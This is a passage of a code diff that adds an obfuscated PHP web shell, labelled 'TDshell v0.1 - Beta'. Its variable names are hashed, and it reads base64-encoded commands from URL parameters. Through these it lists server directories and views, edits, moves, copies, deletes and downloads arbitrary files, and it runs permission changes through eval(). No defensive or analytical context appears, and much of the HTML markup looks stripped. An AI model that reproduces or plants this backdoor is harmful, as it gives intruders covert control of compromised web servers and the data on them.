recursiveDirectoryResponse($_b6525f529051ff28fa112494d8e2d5a3); + } + else + { + $_35822b5d3e252c2cd76a8cfd0bc9215b[] = $_b6525f529051ff28fa112494d8e2d5a3; + }; + }; + }; + return $_35822b5d3e252c2cd76a8cfd0bc9215b; + } + +function file_perms($_3de8e09f12e75d6214bb6e7720875bf2, $_7c6634f9e5e8cd23040778e99232dff3 = false) +{ + if(!@file_exists($_3de8e09f12e75d6214bb6e7720875bf2)) return false; + + $_13f531c0ca48f6a5f8315121bf59ffaa = @fileperms($_3de8e09f12e75d6214bb6e7720875bf2); + + $_cbc4b619c09cd3060d1699bd1b6ec197 = $_7c6634f9e5e8cd23040778e99232dff3 ? 2 : 3; + + return @substr(@decoct($_13f531c0ca48f6a5f8315121bf59ffaa), $_cbc4b619c09cd3060d1699bd1b6ec197); +} + +function view_perms($_65fa4fdb4dc96ba9c4f2629446b1acf9) +{ + if (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0xC000) === 0xC000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "s";} + elseif (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x4000) === 0x4000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "d";} + elseif (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0xA000) === 0xA000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "l";} + elseif (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x8000) === 0x8000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "-";} + elseif (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x6000) === 0x6000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "b";} + elseif (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x2000) === 0x2000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "c";} + elseif (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x1000) === 0x1000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "p";} + else {$_78f05392f016a05e28dc87c1d3bd52a2 = "?";} + $_08a8bc95aa954433522d6e8773049cbc["read"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00400)?"r":"-"; + $_08a8bc95aa954433522d6e8773049cbc["write"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00200)?"w":"-"; + $_08a8bc95aa954433522d6e8773049cbc["execute"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00100)?"x":"-"; + $_aeaf1179391a94c353c7eb37a0e3ec8b["read"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00040)?"r":"-"; + $_aeaf1179391a94c353c7eb37a0e3ec8b["write"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00020)?"w":"-"; + $_aeaf1179391a94c353c7eb37a0e3ec8b["execute"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00010)?"x":"-"; + $_be187a6755c5e72374d46fcbc1c4fe57["read"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00004)?"r":"-"; + $_be187a6755c5e72374d46fcbc1c4fe57["write"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00002)? "w":"-"; + $_be187a6755c5e72374d46fcbc1c4fe57["execute"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00001)?"x":"-"; + if ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x800) {$_08a8bc95aa954433522d6e8773049cbc["execute"] = ($_08a8bc95aa954433522d6e8773049cbc["execute"] == "x")?"s":"S";} + if ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x400) {$_aeaf1179391a94c353c7eb37a0e3ec8b["execute"] = ($_aeaf1179391a94c353c7eb37a0e3ec8b["execute"] == "x")?"s":"S";} + if ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x200) {$_be187a6755c5e72374d46fcbc1c4fe57["execute"] = ($_be187a6755c5e72374d46fcbc1c4fe57["execute"] == "x")?"t":"T";} + return $_78f05392f016a05e28dc87c1d3bd52a2.join("",$_08a8bc95aa954433522d6e8773049cbc).join("",$_aeaf1179391a94c353c7eb37a0e3ec8b).join("",$_be187a6755c5e72374d46fcbc1c4fe57); +} + +function view_perms_color($_3bf3fbc5fc401a716348815f5e794920) +{ + if (!@is_readable($_3bf3fbc5fc401a716348815f5e794920)) {return "".view_perms(@fileperms($_3bf3fbc5fc401a716348815f5e794920))."";} + elseif (!@is_writable($_3bf3fbc5fc401a716348815f5e794920)) {return "".view_perms(@fileperms($_3bf3fbc5fc401a716348815f5e794920))."";} + else {return "".view_perms(@fileperms($_3bf3fbc5fc401a716348815f5e794920))."";} +} + +Class _463f641c8747ebe94fafef7333a99b45 + { + var $TDshell_version = "TDshell v0.1 - Beta"; + var $TDshell_template = array(); + var $TDshell_data = ""; + var $TDshell_time_start = ""; + var $TDshell_time_end = ""; + + function init() + { + $_a3ae37119660c8023a43787f58268912 = $_GET['proc']; + unset($_GET['proc']); + $_2e5c25529adea7d7ad4802936aee0b48 = $_GET['act']; + unset($_GET['act']); + $this->TDshell_time_start = getmicrotime(); + if ($_a3ae37119660c8023a43787f58268912 != "out") + { + $this->header(); + } + if (!empty($_GET['args'])) + { + $_ec4ae32bf3e3a09bae7ff3e84ebbc667 = $_GET['args']; + $_ec4ae32bf3e3a09bae7ff3e84ebbc667 = @explode("-", $_ec4ae32bf3e3a09bae7ff3e84ebbc667); + foreach ($_ec4ae32bf3e3a09bae7ff3e84ebbc667 as $_f16aff67f7495b01405d8cd6181766f0) + { + list($_d3befca3813d65aff84c2353e705a0dd, $_dd5a91d0c375489fc194ecfe1da2e38a) = @explode(":", @base64_decode($_f16aff67f7495b01405d8cd6181766f0), 2); + $_8cc898f326427ea2223c7150e5b6537c[$_d3befca3813d65aff84c2353e705a0dd] = $_dd5a91d0c375489fc194ecfe1da2e38a; + }; + $this->process($_2e5c25529adea7d7ad4802936aee0b48, $_8cc898f326427ea2223c7150e5b6537c); + } + else + { + $this->process($_2e5c25529adea7d7ad4802936aee0b48); + }; + $this->TDshell_time_end = getmicrotime(); + if ($_a3ae37119660c8023a43787f58268912 != "out") + { + $this->footer("" . $this->TDshell_time_end - $this->TDshell_time_start . ""); + } + $this->outall(); + } + + function process($_2e5c25529adea7d7ad4802936aee0b48 = "", $_ec4ae32bf3e3a09bae7ff3e84ebbc667 = array()) + { + switch($_2e5c25529adea7d7ad4802936aee0b48) + { + case "list": + $_2211b5dc6bb7947adcb0bf14cee6591e = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['dir']; + if (empty($_2211b5dc6bb7947adcb0bf14cee6591e)) + { + $this->process("list", array("dir" => "." . DIRECTORY_SEPARATOR)); + return FALSE; + }; + + if (!@is_dir($_2211b5dc6bb7947adcb0bf14cee6591e)) + { + $this->out("Problem listing directory; directory does not exist or cannot be read from."); + return FALSE; + }; + $_8e1c807f3c845b208dba4430e64f4d94 = listDir($_2211b5dc6bb7947adcb0bf14cee6591e); + $this->out("" . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . "   " . view_perms_color($_2211b5dc6bb7947adcb0bf14cee6591e) . "
"); + $this->out("
Listing " . @count($_8e1c807f3c845b208dba4430e64f4d94['DIRS']) . " directories and " . @count($_8e1c807f3c845b208dba4430e64f4d94['FILES']) . " files.
"); + if (empty($_8e1c807f3c845b208dba4430e64f4d94['LINKS'])) + { + $this->out("Problem listing directory; directory does not exist or cannot be read from."); + return FALSE; + }; + $this->out(" + + + + + + + + "); + if (@is_array($_8e1c807f3c845b208dba4430e64f4d94['LINKS'])) + foreach ($_8e1c807f3c845b208dba4430e64f4d94['LINKS'] as $_a70fd9147fda16858f57fe0479d66df0 => $_bf765329c68fb45566ab3b1af145d2c2) + { + $this->out(""); + $this->out(""); + $this->out(""); + $_ca3b4c9ef3a45b7d6dc6af03bad1367b = @posix_getpwuid(@fileowner($_bf765329c68fb45566ab3b1af145d2c2)); + $_35b2f08320a2169a648d2377cae768d3 = @posix_getgrgid(@filegroup($_bf765329c68fb45566ab3b1af145d2c2)); + $_ca3b4c9ef3a45b7d6dc6af03bad1367b = $_ca3b4c9ef3a45b7d6dc6af03bad1367b["name"]; + $_35b2f08320a2169a648d2377cae768d3 = $_35b2f08320a2169a648d2377cae768d3["name"]; + $this->out(""); + $this->out(""); + $this->out(""); + $this->out(""); + $this->out(""); + } + if (@is_array($_8e1c807f3c845b208dba4430e64f4d94['DIRS'])) + foreach ($_8e1c807f3c845b208dba4430e64f4d94['DIRS'] as $_23e43c1054e39145ffd2c948f87f107c => $_b52f6a3170e004ef525cff1e536b7427) + { + $this->out(""); + $this->out(""); + $this->out(""); + $_a7fcd5fac3ae867f8cdb4eb46a683477 = @posix_getpwuid(@fileowner($_b52f6a3170e004ef525cff1e536b7427)); + $_82e66704cd450201cf5168d64d52a4d3 = @posix_getgrgid(@filegroup($_b52f6a3170e004ef525cff1e536b7427)); + $_a7fcd5fac3ae867f8cdb4eb46a683477 = $_a7fcd5fac3ae867f8cdb4eb46a683477["name"]; + $_82e66704cd450201cf5168d64d52a4d3 = $_82e66704cd450201cf5168d64d52a4d3["name"]; + $this->out(""); + $this->out(""); + $this->out(""); + $this->out(""); + $this->out(""); + } + if (@is_array($_8e1c807f3c845b208dba4430e64f4d94['FILES'])) + foreach ($_8e1c807f3c845b208dba4430e64f4d94['FILES'] as $_0136b647df83da4bb9a70b41420d9e05 => $_f3f7e9f4a6ad2cc07b147484d501377d) + { + $_ed02210e63e304003de8ccd669607668 = view_size(@filesize($_f3f7e9f4a6ad2cc07b147484d501377d)); + $_8501d6dd59b45b2159f1f73f6e17b11f = @md5(microtime() . $_0136b647df83da4bb9a70b41420d9e05); + $this->out(""); + $this->out(""); + $this->out(""); + $_d2f5e3cb12e93bae6c4981faf06db693 = @posix_getpwuid(@fileowner($_f3f7e9f4a6ad2cc07b147484d501377d)); + $_048403d36ad14f408d11cb9c81b09d29 = @posix_getgrgid(@filegroup($_f3f7e9f4a6ad2cc07b147484d501377d)); + $_d2f5e3cb12e93bae6c4981faf06db693 = $_d2f5e3cb12e93bae6c4981faf06db693["name"]; + $_048403d36ad14f408d11cb9c81b09d29 = $_048403d36ad14f408d11cb9c81b09d29["name"]; + $this->out(""); + $this->out(""); + $this->out(""); + $_55b73f20aeec06c5111b6ba95bf29532 = @md5_file($_f3f7e9f4a6ad2cc07b147484d501377d); + if (!@preg_match("/^[A-Fa-f0-9]{32}$/", $_55b73f20aeec06c5111b6ba95bf29532)) + { + $_55b73f20aeec06c5111b6ba95bf29532 = "Not Available"; + }; + $this->out(""); + $this->out(""); + } + $this->out("
+ Name + + Size + + Modified + + Owner|Group + + Permissions + + Action +
" . $this->make_link("list", array("dir" => $_bf765329c68fb45566ab3b1af145d2c2 . DIRECTORY_SEPARATOR), $_a70fd9147fda16858f57fe0479d66df0) . "LINK" . @date ("F d Y H:i:s.", @filemtime($_bf765329c68fb45566ab3b1af145d2c2)) . "$_ca3b4c9ef3a45b7d6dc6af03bad1367b|$_35b2f08320a2169a648d2377cae768d3" . $this->make_link("dir", array("name" => $_bf765329c68fb45566ab3b1af145d2c2, "act" => "chmod"), view_perms_color($_bf765329c68fb45566ab3b1af145d2c2)) . "" . $this->make_link("dir", array("name" => $_bf765329c68fb45566ab3b1af145d2c2, "act" => "info"), "[info]") . " - " . $this->make_link("dir", array("name" => $_bf765329c68fb45566ab3b1af145d2c2, "act" => "chmod"), "[chmod]") . " - " . $this->make_link("dir", array("name" => $_bf765329c68fb45566ab3b1af145d2c2, "act" => "delete"), "[delete]") . "
[" . $this->make_link("list", array("dir" => $_b52f6a3170e004ef525cff1e536b7427 . DIRECTORY_SEPARATOR), $_23e43c1054e39145ffd2c948f87f107c) . "]" . view_size(@filesize($_b52f6a3170e004ef525cff1e536b7427)) . "" . @date ("F d Y H:i:s.", @filemtime($_b52f6a3170e004ef525cff1e536b7427)) . "$_a7fcd5fac3ae867f8cdb4eb46a683477|$_82e66704cd450201cf5168d64d52a4d3" . $this->make_link("dir", array("name" => $_b52f6a3170e004ef525cff1e536b7427, "act" => "chmod"), view_perms_color($_b52f6a3170e004ef525cff1e536b7427)) . "" . $this->make_link("dir", array("name" => $_b52f6a3170e004ef525cff1e536b7427, "act" => "info"), "[info]") . " - " . $this->make_link("dir", array("name" => $_b52f6a3170e004ef525cff1e536b7427, "act" => "chmod"), "[chmod]") . " - " . $this->make_link("dir", array("name" => $_b52f6a3170e004ef525cff1e536b7427, "act" => "delete"), "[delete]") . "
" . $this->make_link("file", array("name" => $_f3f7e9f4a6ad2cc07b147484d501377d, "act" => "view"), $_0136b647df83da4bb9a70b41420d9e05). "" . $_ed02210e63e304003de8ccd669607668 . "" . @date ("F d Y H:i:s.", @filemtime($_f3f7e9f4a6ad2cc07b147484d501377d)) . "$_d2f5e3cb12e93bae6c4981faf06db693|$_048403d36ad14f408d11cb9c81b09d29" . $this->make_link("file", array("name" => $_f3f7e9f4a6ad2cc07b147484d501377d, "act" => "chmod"), view_perms_color($_f3f7e9f4a6ad2cc07b147484d501377d)) . "" . $this->make_link("file", array("act" => "edit", "name" => $_f3f7e9f4a6ad2cc07b147484d501377d), "[edit]") . ' - ' . $this->make_link("file", array("act" => "delete", "name" => $_f3f7e9f4a6ad2cc07b147484d501377d), "[delete]") . ' - ' . $this->make_link("file", array("act" => "view", "name" => $_f3f7e9f4a6ad2cc07b147484d501377d), "[view]") . ' - "download", "name" => $_f3f7e9f4a6ad2cc07b147484d501377d), NULL, TRUE) . '" target="_blank">[download] - [MD5][+]
MD5 Hash: ' . $_55b73f20aeec06c5111b6ba95bf29532 . '
' . "
"); + break; + case "file": + $_2e5c25529adea7d7ad4802936aee0b48 = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['act']; + $_d3befca3813d65aff84c2353e705a0dd = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['name']; + if (empty($_2e5c25529adea7d7ad4802936aee0b48)) + { + $this->out("
Error: no act was specified
"); + return FALSE; + }; + if ($_2e5c25529adea7d7ad4802936aee0b48 == "view") + { + if (!@is_file($_d3befca3813d65aff84c2353e705a0dd) || !@is_readable($_d3befca3813d65aff84c2353e705a0dd)) + { + $this->out("
Error: the file does not exist or could not be read from.
"); + return FALSE; + }; + $_4894710f990f9bda9ef69a94d3de9a25['basename'] = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_4894710f990f9bda9ef69a94d3de9a25['path'] = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_4894710f990f9bda9ef69a94d3de9a25['path'] = processdir($_4894710f990f9bda9ef69a94d3de9a25['path']['dirname']) . $_4894710f990f9bda9ef69a94d3de9a25['basename']; + $_4894710f990f9bda9ef69a94d3de9a25['size'] = view_size(@filesize($_d3befca3813d65aff84c2353e705a0dd)); + $_4894710f990f9bda9ef69a94d3de9a25['md5'] = @md5_file($_d3befca3813d65aff84c2353e705a0dd); + $_d2f5e3cb12e93bae6c4981faf06db693 = @posix_getpwuid(@fileowner($_d3befca3813d65aff84c2353e705a0dd)); + $_048403d36ad14f408d11cb9c81b09d29 = @posix_getgrgid(@filegroup($_d3befca3813d65aff84c2353e705a0dd)); + $_d2f5e3cb12e93bae6c4981faf06db693 = $_d2f5e3cb12e93bae6c4981faf06db693["name"]; + $_048403d36ad14f408d11cb9c81b09d29 = $_048403d36ad14f408d11cb9c81b09d29["name"]; + $_4894710f990f9bda9ef69a94d3de9a25['owner_group'] = "$_d2f5e3cb12e93bae6c4981faf06db693|$_048403d36ad14f408d11cb9c81b09d29"; + $_4894710f990f9bda9ef69a94d3de9a25['permissions'] = view_perms_color($_d3befca3813d65aff84c2353e705a0dd); + $_4894710f990f9bda9ef69a94d3de9a25['modified'] = @date ("F d Y H:i:s.", @filemtime($_d3befca3813d65aff84c2353e705a0dd)); + $_4894710f990f9bda9ef69a94d3de9a25['created'] = @date ("F d Y H:i:s.", @filectime($_d3befca3813d65aff84c2353e705a0dd)); + $_4894710f990f9bda9ef69a94d3de9a25['accessed'] = @date ("F d Y H:i:s.", @fileatime($_d3befca3813d65aff84c2353e705a0dd)); + $this->out(' + + + + + + +
+
+ ' . $_4894710f990f9bda9ef69a94d3de9a25['basename'] . ' +
+
+ + + + + +
+
File Information
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ Path: ' . $_4894710f990f9bda9ef69a94d3de9a25['path'] . ' +
+ Size: ' . $_4894710f990f9bda9ef69a94d3de9a25['size'] . ' +
+ MD5: ' . $_4894710f990f9bda9ef69a94d3de9a25['md5'] . ' +
+ Owner|Group: ' . $_4894710f990f9bda9ef69a94d3de9a25['owner_group'] . ' +
+ Permissions: ' . $this->make_link("file", array("act" => "chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_4894710f990f9bda9ef69a94d3de9a25['permissions']) . ' +
+ Creation: ' . $_4894710f990f9bda9ef69a94d3de9a25['created'] . '
+ Modification: ' . $_4894710f990f9bda9ef69a94d3de9a25['modified'] . '
+ Access: ' . $_4894710f990f9bda9ef69a94d3de9a25['accessed'] . '
+ 		+
File Actions
+ + + + + + + + + + + + + + + + + + + +
+ + ' . $this->make_link("file", array("act" => "edit", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[edit]") . ' + +
' . $this->make_link("file", array("act" => "chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[chmod]") . '
+ ' . $this->make_link("file", array("act" => "move", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[move]") . ' +
+ ' . $this->make_link("file", array("act" => "copy", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[copy]") . ' +
+ ' . $this->make_link("file", array("act" => "delete", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[delete]") . ' +
+ "download", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" target="_blank">[download] +
+
+
'); + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "chmod") + { + if (!@is_file($_d3befca3813d65aff84c2353e705a0dd)) + { + $this->out("
Error: the file does not exist or could not be read from.
"); + return FALSE; + }; + $_4efbfa502ea6e58b84de1cdc04aecadf = $_POST['newmode']; + if (empty($_4efbfa502ea6e58b84de1cdc04aecadf)) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_13f531c0ca48f6a5f8315121bf59ffaa = file_perms($_d3befca3813d65aff84c2353e705a0dd, TRUE); + $this->out("Changing file permissions of " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . ", " . view_perms_color($_d3befca3813d65aff84c2353e705a0dd) . " (".substr(decoct(fileperms($_d3befca3813d65aff84c2353e705a0dd)),-4,4).")
" . '
"chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '">
'); + } + else + { + $_4efbfa502ea6e58b84de1cdc04aecadf = @intval($_4efbfa502ea6e58b84de1cdc04aecadf); + $_d3befca3813d65aff84c2353e705a0dd = @base64_encode($_d3befca3813d65aff84c2353e705a0dd); + $_16d3c4cdd343a37db4994c3591c83993 = "chmod (base64_decode('" . $_d3befca3813d65aff84c2353e705a0dd . "'), 0" . $_4efbfa502ea6e58b84de1cdc04aecadf . ");"; + if (eval($_16d3c4cdd343a37db4994c3591c83993) === FALSE) + { + $_d3befca3813d65aff84c2353e705a0dd = @base64_decode($_d3befca3813d65aff84c2353e705a0dd); + $this->out("
Failed to change permissions of file. " . $this->make_link("file", array("name" => $_d3befca3813d65aff84c2353e705a0dd, "act" => "view"), " Click here to go back to file.") . "
"); + } + else + { + @clearstatcache(); + $_d3befca3813d65aff84c2353e705a0dd = @base64_decode($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $_9074596a8e59a87e41db87f3029b4959 = basename($_d3befca3813d65aff84c2353e705a0dd); + $_13f531c0ca48f6a5f8315121bf59ffaa = file_perms($_d3befca3813d65aff84c2353e705a0dd, TRUE); + $this->out("Changing file permissions of " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . ", " . view_perms_color($_d3befca3813d65aff84c2353e705a0dd) . " (".substr(decoct(fileperms($_d3befca3813d65aff84c2353e705a0dd)),-4,4).")
" . '
"chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '">
'); + }; + }; + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "edit") + { + $this->out("
"); + if (!@is_file($_d3befca3813d65aff84c2353e705a0dd) || !@is_readable($_d3befca3813d65aff84c2353e705a0dd)) + { + $this->out("
Error: the file does not exist or could not be read from.
"); + return FALSE; + }; + if (!isset($_POST['newdata'])) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $this->out("Editing file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
" . '
"edit", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" enctype="multipart/form-data">
'); + } + else + { + $_4aac6af23de22a66b42d8ba63e7fc9fe = $_POST['newdata']; + $_4aac6af23de22a66b42d8ba63e7fc9fe = @stripslashes($_4aac6af23de22a66b42d8ba63e7fc9fe); + $_c14f19c15d50e72a5733c0ad88a035b9 = @fopen($_d3befca3813d65aff84c2353e705a0dd, "w"); + @fwrite($_c14f19c15d50e72a5733c0ad88a035b9, $_4aac6af23de22a66b42d8ba63e7fc9fe); + @fclose($_c14f19c15d50e72a5733c0ad88a035b9); + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $this->out("Editing file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
" . 'Success!
"edit", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" enctype="multipart/form-data">
'); + }; + $this->out("
"); + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "move") + { + $_d0b3e9370ba342bbae976cec71233e51 = $_POST['moveto']; + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + if (!isset($_POST['moveto'])) + { + $this->out("Preparing to move file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
" . '
"move", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_d0b3e9370ba342bbae976cec71233e51 = @htmlspecialchars_decode($_d0b3e9370ba342bbae976cec71233e51); + if (!@rename($_d3befca3813d65aff84c2353e705a0dd, $_d0b3e9370ba342bbae976cec71233e51)) + { + $this->out("Preparing to move file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
Failed!
" . '
"move", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_2211b5dc6bb7947adcb0bf14cee6591e = $_d0b3e9370ba342bbae976cec71233e51; + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_2211b5dc6bb7947adcb0bf14cee6591e); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d0b3e9370ba342bbae976cec71233e51); + $this->out("Preparing to move file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d0b3e9370ba342bbae976cec71233e51), $_9074596a8e59a87e41db87f3029b4959) . "
Success!
" . '
"move", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post" enctype="text/plain">
'); + }; + }; + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "copy") + { + $_d4328d5d2bbd5a7a94ae0b56d6e6aade = $_POST['copyto']; + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + if (!isset($_POST['copyto'])) + { + $this->out("Preparing to copy file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
" . '
"copy", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_d4328d5d2bbd5a7a94ae0b56d6e6aade = @htmlspecialchars_decode($_d4328d5d2bbd5a7a94ae0b56d6e6aade); + if (!@copy($_d3befca3813d65aff84c2353e705a0dd, $_d4328d5d2bbd5a7a94ae0b56d6e6aade)) + { + $this->out("Preparing to copy file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
Failed!
" . '
"copy", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $this->out("Preparing to copy file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
Success!
" . '
"copy", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + }; + }; + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "delete") + { + $_2a46f3328eaed89ef8402d4effba331e = $_POST['confirm_delete']; + if (!isset($_POST['confirm_delete'])) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $this->out("Are you sure you wish to delete file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
" . '
"delete", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + if (!@unlink($_d3befca3813d65aff84c2353e705a0dd)) + { + $this->out("Are you sure you wish to delete file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
Failed!
" . '
"delete", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $this->out("File Deleted.
" . $this->make_link("list", array("name" => $_2211b5dc6bb7947adcb0bf14cee6591e), "Click here to go back.")); + }; + } + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "download") + { + if (!@is_file($_d3befca3813d65aff84c2353e705a0dd) || !@is_readable($_d3befca3813d65aff84c2353e705a0dd)) + { + if (@is_file($_d3befca3813d65aff84c2353e705a0dd)) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + } + else + { + $_2211b5dc6bb7947adcb0bf14cee6591e = ""; + }; + $this->out("Could not download file.
